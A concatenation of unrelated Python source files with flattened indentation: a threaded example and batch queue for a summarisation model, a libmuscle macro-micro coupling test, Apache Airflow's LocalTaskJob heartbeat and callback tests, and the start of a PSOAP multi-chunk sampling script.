BATCH_QUEUE_MAX = 10 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, mode, batch_size, single_pass):
self._data_path = data_path
self._vocab = vocab
self._single_pass = single_pass
self.mode = mode
self.batch_size = batch_size
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self.batch_size)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 1 #16 # num threads to fill example queue
self._num_batch_q_threads = 1 #4 # num threads to fill batch queue
self._bucketing_cache_size = 1 #100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
#tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
#tf.logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
while True:
try:
(article, abstract) = next(input_gen) # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
if self._single_pass:
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
break
# abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)] # Use the <s> and </s> tags in abstract to get a list of sentences.
# abstract = str(abstract, encoding='utf8')
abstract_sentences = [abstract]
example = Example(article, abstract_sentences, self._vocab) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
def fill_batch_queue(self):
while True:
if self.mode == 'decode':
# beam search decode mode single example repeated in the batch
ex = self._example_queue.get()
b = [ex for _ in range(self.batch_size)]
self._batch_queue.put(Batch(b, self._vocab, self.batch_size))
else:
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len, reverse=True) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self.batch_size):
batches.append(inputs[i:i + self.batch_size])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._vocab, self.batch_size))
def watch_threads(self):
while True:
# tf.logging.info(
# 'Bucket queue size: %i, Input queue size: %i',
# self._batch_queue.qsize(), self._example_queue.qsize())
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
#tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
#tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
while True:
try:
e = next(example_generator) # e is a tf.Example
article_text = e.features.feature['article'].bytes_list.value[0].decode() # the article text was saved under the key 'article' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode() # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
# tf.logging.error('Failed to get article or abstract from example')
continue
except StopIteration:
# tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
break
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
# tf.logging.warning('Found an example with empty article text. Skipping it.')
continue
else:
yield (article_text, abstract_text)
|
test_cpp_macro_micro.py
|
import multiprocessing as mp
from pathlib import Path
import subprocess
import sys
import numpy as np
from libmuscle import Instance, Message
from ymmsl import Operator
from .conftest import skip_if_python_only
def run_macro(instance_id: str):
sys.argv.append('--muscle-instance={}'.format(instance_id))
macro()
def macro():
instance = Instance({
Operator.O_I: ['out'],
Operator.S: ['in']})
while instance.reuse_instance():
# f_init
assert instance.get_setting('test1') == 13
for i in range(2):
# o_i
test_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
assert test_array.shape == (2, 3)
assert test_array.flags.c_contiguous
data = {
'message': 'testing',
'test_grid': test_array}
instance.send('out', Message(i * 10.0, (i + 1) * 10.0, data))
# s/b
msg = instance.receive('in')
assert msg.data['reply'] == 'testing back {}'.format(i)
assert msg.data['test_grid'].array.dtype.kind == 'i'
assert msg.data['test_grid'].array.dtype.itemsize == 8
assert msg.data['test_grid'].array[0][1] == 2
assert msg.timestamp == i * 10.0
@skip_if_python_only
def test_cpp_macro_micro(mmp_server_process_simple):
# create C++ micro model
# see libmuscle/cpp/src/libmuscle/tests/micro_model_test.cpp
cpp_build_dir = Path(__file__).parents[1] / 'libmuscle' / 'cpp' / 'build'
lib_paths = [
cpp_build_dir / 'grpc' / 'c-ares' / 'c-ares' / 'lib',
cpp_build_dir / 'grpc' / 'zlib' / 'zlib' / 'lib',
cpp_build_dir / 'grpc' / 'openssl' / 'openssl' / 'lib',
cpp_build_dir / 'protobuf' / 'protobuf' / 'lib',
cpp_build_dir / 'grpc' / 'grpc' / 'lib',
cpp_build_dir / 'msgpack' / 'msgpack' / 'lib']
env = {
'LD_LIBRARY_PATH': ':'.join(map(str, lib_paths))}
cpp_test_dir = cpp_build_dir / 'libmuscle' / 'tests'
cpp_test_micro = cpp_test_dir / 'micro_model_test'
micro_result = subprocess.Popen(
[str(cpp_test_micro), '--muscle-instance=micro'], env=env)
# run macro model
macro_process = mp.Process(target=run_macro, args=('macro',))
macro_process.start()
# check results
micro_result.wait()
assert micro_result.returncode == 0
macro_process.join()
assert macro_process.exitcode == 0
|
test_local_task_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import signal
import time
import unittest
import uuid
from multiprocessing import Lock, Value
from unittest import mock
from unittest.mock import patch
import pytest
from parameterized import parameterized
from airflow import settings
from airflow.exceptions import AirflowException, AirflowFailException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models.dag import DAG, DagModel
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_jobs, clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
# pylint: skip-file
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_jobs()
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def tearDown(self) -> None:
clear_db_jobs()
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}
)
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(
run_id="test", state=State.SUCCESS, execution_date=DEFAULT_DATE, start_date=DEFAULT_DATE
)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
assert all(check_result_1)
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
assert all(check_result_2)
def test_localtaskjob_heartbeat(self):
session = settings.Session()
dag = DAG('test_localtaskjob_heartbeat', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
ti.task = op1
ti.refresh_from_task(op1)
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.process = mock.Mock()
with pytest.raises(AirflowException):
job1.heartbeat_callback()
job1.task_runner.process.pid = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
assert ti.pid != os.getpid()
job1.heartbeat_callback(session=None)
job1.task_runner.process.pid = 2
with pytest.raises(AirflowException):
job1.heartbeat_callback()
@mock.patch('airflow.jobs.local_task_job.psutil')
def test_localtaskjob_heartbeat_with_run_as_user(self, psutil_mock):
session = settings.Session()
dag = DAG('test_localtaskjob_heartbeat', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1', run_as_user='myuser')
dag.clear()
dr = dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.pid = 2
ti.hostname = get_hostname()
session.commit()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
ti.task = op1
ti.refresh_from_task(op1)
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.process = mock.Mock()
job1.task_runner.process.pid = 2
# Here, ti.pid is 2, the parent process of ti.pid is a mock(different).
# And task_runner process is 2. Should fail
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
job1.task_runner.process.pid = 1
# We make the parent process of ti.pid to equal the task_runner process id
psutil_mock.Process.return_value.ppid.return_value = 1
ti.state = State.RUNNING
ti.pid = 2
# The task_runner process id is 1, same as the parent process of ti.pid
# as seen above
assert ti.run_as_user
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
# Here the task_runner process id is changed to 2
# while parent process of ti.pid is kept at 1, which is different
job1.task_runner.process.pid = 2
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
def test_heartbeat_failed_fast(self):
"""
Test that task heartbeat will sleep when it fails fast
"""
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(
run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
assert len(heartbeat_records) > 2
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
# Assert that difference small enough
delta = (time2 - time1).total_seconds()
assert abs(delta - job.heartrate) < 0.5
@pytest.mark.quarantined
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
assert State.RUNNING == ti.state
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
assert not process.is_alive()
ti.refresh_from_db()
assert State.SUCCESS == ti.state
def test_localtaskjob_double_trigger(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
assert ti.pid == 1
assert ti.state == State.RUNNING
session.close()
@pytest.mark.quarantined
def test_localtaskjob_maintain_heart_rate(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
assert mock_start.call_count == 1
assert mock_ret_code.call_count == 2
time_end = time.time()
assert self.mock_base_job_sleep.call_count == 1
assert job1.state == State.SUCCESS
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
assert time_end - time_start < job1.heartrate
session.close()
def test_mark_failure_on_failure_callback(self):
"""
Test that ensures that mark_failure in the UI fails
the task, and executes on_failure_callback
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
def check_failure(context):
with failure_callback_called.get_lock():
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure'
assert context['exception'] == "task marked as failed externally"
def task_function(ti):
with create_session() as session:
assert State.RUNNING == ti.state
ti.log.info("Marking TI as failed 'externally'")
ti.state = State.FAILED
session.merge(ti)
session.commit()
time.sleep(10)
# This should not happen -- the state change should be noticed and the task should get killed
with task_terminated_externally.get_lock():
task_terminated_externally.value = 0
with DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE) as dag:
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_failure_callback=check_failure,
)
dag.clear()
with create_session() as session:
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
with timeout(30):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callable above bigger
job1.run()
ti.refresh_from_db()
assert ti.state == State.FAILED
assert failure_callback_called.value == 1
assert task_terminated_externally.value == 1
@patch('airflow.utils.process_utils.subprocess.check_call')
@patch.object(StandardTaskRunner, 'return_code')
def test_failure_callback_only_called_once(self, mock_return_code, _check_call):
"""
Test that ensures that when a task exits with failure by itself,
failure callback is only called once
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
callback_count_lock = Lock()
def failure_callback(context):
with callback_count_lock:
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_failure_callback_race'
assert isinstance(context['exception'], AirflowFailException)
def task_function(ti):
raise AirflowFailException()
dag = DAG(dag_id='test_failure_callback_race', start_date=DEFAULT_DATE)
task = PythonOperator(
task_id='test_exit_on_failure',
python_callable=task_function,
on_failure_callback=failure_callback,
dag=dag,
)
dag.clear()
with create_session() as session:
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Simulate race condition where job1 heartbeat ran right after task
# state got set to failed by ti.handle_failure but before task process
# fully exits. See _execute loop in airflow/jobs/local_task_job.py.
# In this case, we have:
# * task_runner.return_code() is None
# * ti.state == State.Failed
#
# We also need to set return_code to a valid int after job1.terminating
# is set to True so _execute loop won't loop forever.
def dummy_return_code(*args, **kwargs):
return None if not job1.terminating else -9
mock_return_code.side_effect = dummy_return_code
with timeout(10):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callable above bigger
job1.run()
ti.refresh_from_db()
assert ti.state == State.FAILED # task exits with failure state
assert failure_callback_called.value == 1
@pytest.mark.quarantined
def test_mark_success_on_success_callback(self):
"""
Test that ensures that where a task is marked success in the UI
on_success_callback gets executed
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
success_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def success_callback(context):
with shared_mem_lock:
success_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_success'
dag = DAG(dag_id='test_mark_success', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
def task_function(ti):
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_success_callback=success_callback,
dag=dag,
)
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 25):
ti.refresh_from_db()
if ti.state == State.RUNNING:
break
time.sleep(0.2)
assert ti.state == State.RUNNING
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
assert success_callback_called.value == 1
assert task_terminated_externally.value == 1
assert not process.is_alive()
@parameterized.expand(
[
(signal.SIGTERM,),
(signal.SIGKILL,),
]
)
def test_process_kill_calls_on_failure_callback(self, signal_type):
"""
Test that ensures that when a task is killed with sigterm or sigkill
on_failure_callback gets executed
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def failure_callback(context):
with shared_mem_lock:
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure'
dag = DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
def task_function(ti):
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
task = PythonOperator(
task_id='test_on_failure',
python_callable=task_function,
on_failure_callback=failure_callback,
dag=dag,
)
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 20):
ti.refresh_from_db()
if ti.state == State.RUNNING and ti.pid is not None:
break
time.sleep(0.2)
assert ti.state == State.RUNNING
assert ti.pid is not None
os.kill(ti.pid, signal_type)
process.join(timeout=10)
assert failure_callback_called.value == 1
assert task_terminated_externally.value == 1
assert not process.is_alive()
def test_task_exit_should_update_state_of_finished_dagruns_with_dag_paused(self):
"""Test that with DAG paused, DagRun state will update when the tasks finishes the run"""
dag = DAG(dag_id='test_dags', start_date=DEFAULT_DATE)
op1 = PythonOperator(task_id='dummy', dag=dag, owner='airflow', python_callable=lambda: True)
session = settings.Session()
orm_dag = DagModel(
dag_id=dag.dag_id,
has_task_concurrency_limits=False,
next_dagrun=dag.start_date,
next_dagrun_create_after=dag.following_schedule(DEFAULT_DATE),
is_active=True,
is_paused=True,
)
session.add(orm_dag)
session.flush()
# Write Dag to DB
dagbag = DagBag(dag_folder="/dev/null", include_examples=False, read_dags_from_db=False)
dagbag.bag_dag(dag, root_dag=dag)
dagbag.sync_to_db()
dr = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
assert dr.state == State.RUNNING
ti = TaskInstance(op1, dr.execution_date)
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
job1.run()
session.add(dr)
session.refresh(dr)
assert dr.state == State.SUCCESS
@pytest.fixture()
def clean_db_helper():
yield
clear_db_jobs()
clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
@pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]]) # type: ignore
@mock.patch("airflow.jobs.local_task_job.get_task_runner")
def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes):
unique_prefix = str(uuid.uuid4())
dag = DAG(dag_id=f'{unique_prefix}_test_number_of_queries', start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_state_succeeded1', dag=dag)
dag.clear()
dag.create_dagrun(run_id=unique_prefix, execution_date=DEFAULT_DATE, state=State.NONE)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
mock_get_task_runner.return_value.return_code.side_effects = return_codes
job = LocalTaskJob(task_instance=ti, executor=MockExecutor())
with assert_queries_count(16):
job.run()
|
sample_parallel.py
|
import argparse
parser = argparse.ArgumentParser(description="Sample the distribution across multiple chunks.")
parser.add_argument("run_index", type=int, default=0, help="Which output subdirectory to save this particular run, in the case you may be running multiple concurrently.")
parser.add_argument("--debug", action="store_true", help="Print out debug commands to log.log")
args = parser.parse_args()
import yaml
from functools import partial
try:
f = open("config.yaml")
config = yaml.load(f)
f.close()
except FileNotFoundError as e:
print("You need to copy a config.yaml file to this directory, and then edit the values to your particular case.")
raise
from multiprocessing import Process, Pipe
import os
import numpy as np
from astropy.io import ascii
# from psoap.samplers import StateSampler
import psoap.constants as C
from psoap.data import Chunk, lredshift, replicate_wls
from psoap import utils
from psoap import orbit
from psoap import covariance
from scipy.linalg import cho_factor, cho_solve
from numpy.linalg import slogdet
import gc
import logging
from itertools import chain
from collections import deque
from operator import itemgetter
import shutil
# Create an output directory to store the samples from this run
run_index = args.run_index
routdir = config["outdir"] + "/run{:0>2}/".format(run_index)
if os.path.exists(routdir):
print("Deleting", routdir)
shutil.rmtree(routdir)
print("Creating ", routdir)
os.makedirs(routdir)
# Copy yaml file from current working directory to routdir for archiving purposes
shutil.copy("config.yaml", routdir + "config.yaml")
# When running a hierarchical model, we'll need to do this.
# # Create subdirectories
# for model_number in range(len(Starfish.data["files"])):
# for order in Starfish.data["orders"]:
# order_dir = routdir + Starfish.specfmt.format(model_number, order)
# print("Creating ", order_dir)
# os.makedirs(order_dir)
# Load the list of chunks
chunks = ascii.read(config["chunk_file"])
print("Sampling the following chunks of data, one chunk per core.")
print(chunks)
n_chunks = len(chunks)
# list of keys from 0 to (norders - 1)
chunk_keys = np.arange(n_chunks)
# Load data and apply masks
chunk_data = []
for chunk in chunks:
order, wl0, wl1 = chunk
chunkSpec = Chunk.open(order, wl0, wl1, limit=config["epoch_limit"])
chunkSpec.apply_mask()
chunk_data.append(chunkSpec)
# The name of the model
model = config["model"]
pars = config["parameters"]
# Set up the logger
if args.debug:
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", filename="{}log.log".format(routdir), level=logging.DEBUG, filemode="w", datefmt='%m/%d/%Y %I:%M:%S %p')
# Create a partial function which maps a vector of floats to parameters
convert_vector_p = partial(utils.convert_vector, model=model, fix_params=config["fix_params"], **pars)
def info(title):
'''
Print process information useful for debugging.
'''
print(title)
print('module name:', __name__)
if hasattr(os, 'getppid'): # only available on Unix
print('parent process:', os.getppid())
print('process id:', os.getpid())
class Worker:
def __init__(self, debug=False):
'''
This object contains all of the variables necessary for the partial
lnprob calculation for one chunk. It is designed to first be
instantiated within the main processes and then forked to other
subprocesses. Once operating in the subprocess, the variables specific
to the order are loaded with an `INIT` message call, which tells which key
to initialize on in the `self.initialize()`.
'''
# Choose which lnprob we will be using based off of the model type
# lnprobs = {"SB1":self.lnprob_SB1, "SB2":self.lnprob_SB2, "ST3":self.lnprob_ST3}
# self.lnprob = lnprobs[model]
# The list of possible function calls we can make.
self.func_dict = {"INIT": self.initialize,
"LNPROB": self.lnprob,
"FINISH": self.finish
}
self.debug = debug
if args.debug:
self.logger = logging.getLogger("{}".format(self.__class__.__name__))
def initialize(self, key):
'''
Initialize to the correct chunk of data.
:param key: key
:param type: int
This method should only be called after all subprocess have been forked.
'''
self.key = key
# Load the proper chunk
data = chunk_data[self.key]
self.lwl = data.lwl
self.fl = data.fl
self.sigma = data.sigma * config["soften"]
self.date = data.date
# Note that mask is already applied in loading step. This is to transform velocity shifts
# Evaluated off of self.date1D
self.mask = data.mask
self.date1D = data.date1D
# Total number of wavelength points (after applying mask)
self.N = data.N
if args.debug:
self.logger = logging.getLogger("{} {}".format(self.__class__.__name__, self.key))
if self.debug:
self.logger.setLevel(logging.DEBUG)
else:
self.logger.setLevel(logging.INFO)
self.logger.info("Initializing model on chunk {}.".format(self.key))
# Set up temporary holders for V11 matrix.
# self.N is the length of the masked, flattened wl vector.
self.V11 = np.empty((self.N, self.N), dtype=np.float64)
# Create an orbit
self.orb = orbit.models[model](**pars, obs_dates=self.date1D)
def lnprob(self, p):
'''
Unified lnprob interface.
Args:
p (np.float): vector containing the model parameters
Returns:
float : the lnlikelihood of the model parameters.
'''
# separate the parameters into orbital and GP based upon the model type
# also backfill any parameters that we have fixed for this analysis
p_orb, p_GP = convert_vector_p(p)
velocities = orbit.models[model](*p_orb, self.date1D).get_velocities()
# Make sure none are faster than speed of light
if np.any(np.abs(np.array(velocities)) >= C.c_kms):
return -np.inf
# Get shifted wavelengths
lwls = replicate_wls(self.lwl, velocities, self.mask)
# Feed velocities and GP parameters to fill out covariance matrix appropriate for this model
lnp = covariance.lnlike[model](self.V11, *lwls, self.fl, self.sigma, *p_GP)
# lnp = covariance.lnlike_f_g_george(*lwls, self.fl, self.sigma, *p_GP)
gc.collect()
return lnp
def finish(self, *args):
'''
Wrap up the sampling and write the samples to disk.
'''
pass
def brain(self, conn):
'''
The infinite loop of the subprocess, which continues to listen for
messages on the pipe.
'''
self.conn = conn
alive = True
while alive:
#Keep listening for messages put on the Pipe
alive = self.interpret()
#Once self.interpret() returns `False`, this loop will die.
self.conn.send("DEAD")
def interpret(self):
'''
Interpret the messages being put into the Pipe, and do something with
them. Messages are always sent in a 2-arg tuple (fname, arg)
Right now we only expect one function and one argument but this could
